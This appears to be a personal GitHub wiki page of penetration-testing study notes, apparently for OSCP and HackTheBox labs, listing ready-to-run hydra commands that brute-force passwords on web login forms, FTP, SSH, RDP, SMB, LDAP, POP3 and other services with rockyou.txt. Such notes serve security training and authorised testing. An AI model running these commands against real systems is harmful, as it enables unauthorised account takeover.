-
Notifications
You must be signed in to change notification settings - Fork 14
Brute Force
Alvin Smith edited this page Dec 15, 2023
·
2 revisions
hydra -l name -P rockyou.txt $ip http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
hydra -L usernames.txt -P passwords.txt -f -v 10.10.33.144 http-post-form "/login.php:username=^USER^&password=^PASS^:Please enter the correct credentials"
hydra -t 4 -l name -P rockyou.txt -vV $ip ftp -s non-default-port
-t 4
4 are parallel connections per target
hydra -l molly -P rockyou.txt $ip ssh -V
hydra -P rockyou.txt -v $ip snmp/smtp
hydra -l bob -P rockyou.txt $ip http-get /protected
The trick here is to separately set the IP and PATH
hydra -t 1 -V -f -l administrator -P rockyou.txt rdp://$ip
hydra -L users.txt -P rockyou.txt $ip smb/ldap2/pop3 -V -f
- https://github.com/A1vinSmith/OSCP-PWK/blob/master/HackTheBox/Windows/Active%20Directory/Sauna/README.md#username-anarchy-from-website-as-source
- https://github.com/A1vinSmith/username-anarchy?organization=A1vinSmith&organization=A1vinSmith
Try ZAP, Burp or Wfuzz as backup